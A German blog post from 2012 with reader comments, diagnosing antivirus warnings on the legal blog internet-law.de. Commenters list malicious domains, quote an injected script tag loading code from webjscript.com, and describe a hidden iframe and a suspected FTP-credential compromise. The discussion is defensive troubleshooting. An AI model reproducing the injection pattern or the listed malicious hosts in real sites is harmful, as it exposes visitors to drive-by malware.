Malware auf meinem Blog?
Liebe Leser,
ich habe jetzt mehrfach die Rückmeldung bekommen, dass über mein Blog ein Trojaner oder Virus verbreitet würde. Laut der Zuschrift eines Lesers hat sein Virenscanner folgende Meldung ausgeworfen:
Virus: SWF:Dropper [Heur] (Engine B)
Virus beim Laden von Web-Inhalten gefunden.
Adresse: strnglink.com
Status: Der Zugriff wurde verweigert.
Leider konnte ich das bislang nicht verifizieren. Diejenigen, die ebenfalls Virenmeldungen bekommen und ggf. einen Tipp haben, was genau befallen ist, bzw. wo im Blog sich der Schadcode verbirgt, würde ich bitten, sich bei mir zu melden. Ich möchte niemanden schädigen, kann das Vorhandensein eines Schädlings derzeit aber nicht nachvollziehen.
es handelt sich um einen heuristischen Fund, daher kann es durchaus ein Fehlalarm sein. Wenn sich die Datei noch in der Quarantäne deines Virenscanners befindet, dann lade sie mal zu virustotal hoch, sie wird dann sofort von über 40 Virenscannern gecheckt und das Ergebnis aufgelistet.
http://www.virustotal.com
Comment by Maz — 21.12, 2012 @ 14:58
Klingt nach irgendeinem Flash-Kram – ich konnte hier aber kein Flash finden.
Entweder ist der Webserver auch befallen und liefert nur ab und an und an bestimmte Browser Malware mit oder es ist mal wieder eine Falschmeldung.
Comment by Bernd — 21.12, 2012 @ 15:09
Frohe Weihnachten und ein erfolgreiches gesundes Neues Jahr
Comment by Werner Siebers — 21.12, 2012 @ 17:32
Also Virustotal findet nichts https://www.virustotal.com/url/4ebdf4a86c090ca8c7a69196f9823d60df477c44f2d302266fd5650a983a0efe/analysis/1356109470/
Comment by Turbo Sandzwerg — 21.12, 2012 @ 18:05
ENOINFO ;-)
Vielleicht kann einer derjenigen, die diese Meldung bekommen, Antworten auf folgende Fragen geben:
Beim Zugriff auf welche Seite kommt die Meldung?
Welche Antivirus-Software?
Kommt die Meldung *nur* beim Zugriff auf http://www.internet-law.de?
Uebrigens liefert strnlink.com eine angebliche „Styx Vulnerability Browser Stress-Test Platform“. In welchem Zusammenhang diese Site mit internet-law stehen sollte – keine Idee.
HTH,
Lupe Christoph
Comment by Lupe Christoph — 21.12, 2012 @ 19:27
Ich bin derjenige, der das gemeldet hat. Ich bekam 2 mal beim Besuch dieser Seite hier die Fehlermeldung. Bei anderen Seiten trat die Meldung nicht auf. Mein Virenscanner ist „G Data Internet Security 2013“.
Heute ist der Fehler aber nicht mehr aufgetreten.
Comment by Rangar — 21.12, 2012 @ 19:45
ich habe hier auch mal eine Warnung von Dr. Norton erhalten…
Comment by Dr Norton — 21.12, 2012 @ 19:58
Ich bekam auch Warnungen von Dr. Norton.
Comment by Antaki — 21.12, 2012 @ 20:36
Die Meldungen kommen auch von Kaspersky seit fünf oder sechs Tagen und immer nur beim Zugriff auf dieses Blog. Jedes Mal ist es ein anderer URL, der als Phishing-Link erkannt wird. Alle URL haben die gleiche IP-Adresse in Kazakhstan.
Hier der „detaillierter Bericht“:
Schädlicher Link Inaktiv 22.12.2012 http://bliclink.com/
Schädlicher Link Inaktiv 20.12.2012 http://strnglink.com/
Schädlicher Link Inaktiv 19.12.2012 http://litenames.com/
Schädlicher Link Inaktiv 18.12.2012 http://liteklick.com/
Schädlicher Link Inaktiv 17.12.2012 http://dworddb.com/
Schädlicher Link Inaktiv 16.12.2012 http://hreflnk.com/
Comment by Dreizack — 22.12, 2012 @ 00:48
Die Meldungen kommen auch von Kaspersky seit fünf oder sechs Tagen und immer nur beim Zugriff auf dieses Blog. Jedes Mal ist es ein anderer URL, der als Phishing-Link erkannt wird. Alle URL haben die gleiche IP-Adresse in Kazakhstan.
Hier der „detaillierter Bericht“:
Schädlicher Link Inaktiv 22.12.2012 bliclink.com
Schädlicher Link Inaktiv 20.12.2012 strnglink.com
Schädlicher Link Inaktiv 19.12.2012 litenames.com
Schädlicher Link Inaktiv 18.12.2012 liteklick.com
Schädlicher Link Inaktiv 17.12.2012 dworddb.com
Schädlicher Link Inaktiv 16.12.2012 hreflnk.com
Comment by Dreizack — 22.12, 2012 @ 00:50
Seit fünf oder sechs Tagen meldet Kaspersky einen Phishing-Link beim Besuch dieses Blogs. Jedes Mal ist es ein anderer URL. Alle URL gehören zur selben IP-Adresse in Kazakhstan. Dieser Angriff wird beschreiben z.B. in Dynamoo’s Blog … http://blog.dynamoo.com/ vom 21. Dezember.
Ein Auszug aus dem Bericht von Kaspersky zeigt folgenden URL (jeweils mit .com): bliclink, strnglink, litenames, liteklick, dworddb, hreflnk.
Jetzt müsste man wissen, wo der Schadcode in Ihrem Blog sich verbirgt.
Comment by Dreizack — 22.12, 2012 @ 01:50
Wenn man diese Seite mit frischer IP-Adresse (dazu neu einwählen) erstmals aufruft, wird folgendes Script über den Quelltext eingebettet:
script src=’http://webjscript.com/webjs‘ type=’text/javascript‘
Das scheint zwar derzeit leer zu sein, aber macht alleine wegen dieses Verschleierungsverhaltens sofort einen sehr verdächtigen Eindruck.
Hosting bei Hetzner in Deutschland mit tchechischer Whois-Protection:
http://bgp.he.net/ip/88.198.51.123#_dns
http://bgp.he.net/dns/webjscript.com#_whois
Comment by Ronny Rabauke — 22.12, 2012 @ 04:04
Ich hatte die Meldung auch 1x, wurde geblockt von Avast.
Comment by Moon — 22.12, 2012 @ 07:23
Kann auch an euren Browsern und den verwendeten Addons liegen.
Zu ner korrekten Fehlerberschreigung gehört:
1. Welche URL
2. Welcher Scanner
3. Welcher Browser
4- Welche Addons
Comment by Troll — 22.12, 2012 @ 09:56
> Beim Zugriff auf welche Seite kommt die Meldung?
http://www.internet-law.de?
> Welche Antivirus-Software?
Avast internet securitiy
> Kommt die Meldung *nur* beim Zugriff auf http://www.internet-law.de?
Ja, aber nur einmal, beim nächsten Aufruf kommt die Meldung nicht mehr.
Blockiert wurde ein Zugriff/Datei auf http://www.blicklink.com
_________________________________________
URL: http://bliclink.com/iMbmKg14Tjt0o6Bv0uPi…
Prozess: C:\Program Files (x86)\Mozilla Firefox\f…
Infektion: URL:Mal
Comment by Geheimrat — 22.12, 2012 @ 11:31
Ich habe zwar keinen Virenscanner, habe aber auch in den letzten Tagen mehrfach gesehen, dass ein Java-Applet und ein Flash-Objekt geladen werden wollte. Ich blockiere aktive Inhalte grundsätzlich, darum fällt das direkt auf. Ich habe mir die Struktur der Seite im Webseiten-Debugger angeschaut: da war ein Javascript in den der Seite eingebettet, welches sich selbst durch einen versteckten austauscht, welcher dann die Java- und Flash-Objekte lädt. Auffällig war, dass der Code syntaktisch falsch platziert war, eigentlich darf der nicht im , sondern erst im auftauchen. Interessant war außerdem, dass es nicht bei jedem Aufruf passiert, sondern nur manchmal. Anscheinend auf dem Server nur mit einer gewissen Wahrscheinlichkeit der Schadcode eingefügt. Ich halte jedenfalls mittlerweile Deinen Webserver für ziemlich verseucht. :)
Comment by Kolja — 22.12, 2012 @ 13:48
Böde Software, die tags sind verloren gegangen. Nochmal, die Worte in Anführungszeichen sollten eigentlich HTML-Tags sein:
Ich habe zwar keinen Virenscanner, habe aber auch in den letzten Tagen mehrfach gesehen, dass ein Java-Applet und ein Flash-Objekt geladen werden wollte. Ich blockiere aktive Inhalte grundsätzlich, darum fällt das direkt auf. Ich habe mir die Struktur der Seite im Webseiten-Debugger angeschaut: da war ein Javascript in den „head“ der Seite eingebettet, welches sich selbst durch einen versteckten „iframe“ austauscht, welcher dann die Java- und Flash-Objekte lädt. Auffällig war, dass der Code syntaktisch falsch platziert war, eigentlich darf der „iframe“ nicht im „head“, sondern erst im „body“ auftauchen. Interessant war außerdem, dass es nicht bei jedem Aufruf passiert, sondern nur manchmal. Anscheinend auf dem Server nur mit einer gewissen Wahrscheinlichkeit der Schadcode eingefügt. Ich halte jedenfalls mittlerweile Deinen Webserver für ziemlich verseucht. :)
Comment by Kolja — 22.12, 2012 @ 13:50
ich hatte heute vormittag auch dieses Java Dingens, wurde gleich beim Versuch zu laden gemeldet und abgewehrt.
Jetzt keinerlei Probleme.
Frohe feiertage!
Comment by markenware — 22.12, 2012 @ 17:49
Manchmal sind es auch die Tracker oder Werbung, die „fremde Gäste“ mit sich bringen.
Comment by Frank — 22.12, 2012 @ 21:25
Sophos sagt Mal/HTMLGen-A ebenfalls mit den o.g. URLs.
Comment by BB — 22.12, 2012 @ 21:28
Ich beobachte die Kommentare schon seit 2 Tagen und möchte nun auch mal meinen Senf dazu geben.
Ich habe den Firefox mit der Erweiterung NoScript, mein Scanner ist ClamWin und merke nichts. Stellt um Himmels Willen nicht die Behauptung auf, das dies eine schlechte Softwarekombination sei.
Die meisten Hersteller von Antivirensoftware sind Scharlatane und beweisen euch mit solchen absurden Meldungen, das man am Besten ihre Software in der Profi-Vollversion gekauft. Nur so habt ihr Sicherheit (was auch immer sie darunter verstehen).
Man muss auch beachten, das Seiten wie diese http://www.stopbadware.org blockiert werden und Virustotal meldet:
This URL was already analysed by VirusTotal on 2012-10-08 07:18:46 UTC.
Detection ratio: 0/30
Comment by Hinterwäldler — 23.12, 2012 @ 13:03
Benutzt du zufällig Nutzer von Microsoft Office Outlook Web oder und filezilla?
Comment by grx — 24.12, 2012 @ 10:56
Habe auch gerade wieder das verdächtige Script von der Adresse http://webjscript.com/webjs im Quelltext gehabt. Der Server webjscript.com ist aber momentan nicht erreichbar, daher wird kein Schadcode nachgeladen.
Comment by Kolja — 24.12, 2012 @ 13:55
Wenn man mir jetzt jemand einen Tipp geben könnte, wo genau sich bei mir der dazugehörige Code befindet, dann wäre ich schlauer.
Comment by Stadler — 25.12, 2012 @ 14:13
@Stadler,
für mich liest sich das so, als würde es nicht an der Seite liegen. Der Hinweis (12) scheint mir sehr valide (auch wenn ich das Verhalten bei mir nicht beobachten konnte).
Was tun?
Als erstes freundlich bei dem Host 1&1 Internet AG anfragen, ob denen was bekannt ist oder ob die immer mal wieder die Code Pages verändern.
Für mich liest sich das so, als wäre deren WebServer kompromitiert (was ich nicht glaube) oder aber das ganze wäre von denen Absicht.
Comment by rojer — 25.12, 2012 @ 20:12
Die Comments #12 und #17 wegen des Scripts sagen das Wesentliche. Mein Comment #11 erklärt, was die Wirkung ist oder war. Konkret heißt das, wenn ich das Blog mit einer frischen IP-Adresse aufrufe und den Quellcode anschaue, sehe ich in Zeilen 18 bis 20 Folgendes:
(link rel=“alternate“ type=“application/atom+xml“ title=“Atom 0.3″ href=“http://www.internet-law.de/feed/atom“ /)
(script src=’http://webjscript.com/webjs‘ type=’text/javascript‘)(/script) (link rel=“pingback“ href=“http://www.internet-law.de/xmlrpc.php“ /)
(link rel=’archives‘ title=’Dezember 2012′ href=’http://www.internet-law.de/2012/12′ /)
Wenn ich später die Seite aufrufe, erscheint die Halbzeile am Anfang von Zeile 19 nach „(script“ NICHT. Sie gehört nicht dahin. Nach dem Scannen des eigenen Systems kann der Hoster oder ein WordPress-Forum vielleicht helfen, die Datenbank zu bereinigen. Viel Erfolg!
Comment by Dreizack — 25.12, 2012 @ 23:56
Sehr geehrter Herr Stadler,
das von den Usern beschriebenes Verhalten kommt mir aufgrund eigener Erfahrung als Webhoster bekannt vor.
Prüfen Sie am besten per FTP, wann die index.* Dateien das letzte mal aktualisiert wurden.
Persönlich hatte ich die Erfahrung das bei einem Kunden ein PC mit einem Virus infiziert wurde, welcher per FTP div. Webseiten bearbeitet hatte. Diese Zugangsdaten wurden mitgesnifft und jegliche index.* Dateien per Skript in der Nacht modifiziert.
Das nachladen der schädlichen JS Elemente passierte meist nur einmal pro IP Zugriff – So das ein prüfen per F5 Taste / Neu laden nicht möglich war.
Alternativ kann man beim Hoster nach den FTP Log Dateien nachfragen – dort könnte geprüft werden, ob es an Ihrem Blog liegt oder an extern eingebundene Fremdinhalte.
Viel Erfolg beim „search and rescue“.
Comment by Steffen B — 27.12, 2012 @ 07:24
Nachsatz zum neuen Jahr:
Einen Trojaner merkt man nicht, den hat man. Und später darf man sagen: Der will doch nur spielen.
Wuff!
Comment by Ralf (Informatiker) — 31.12, 2012 @ 14:06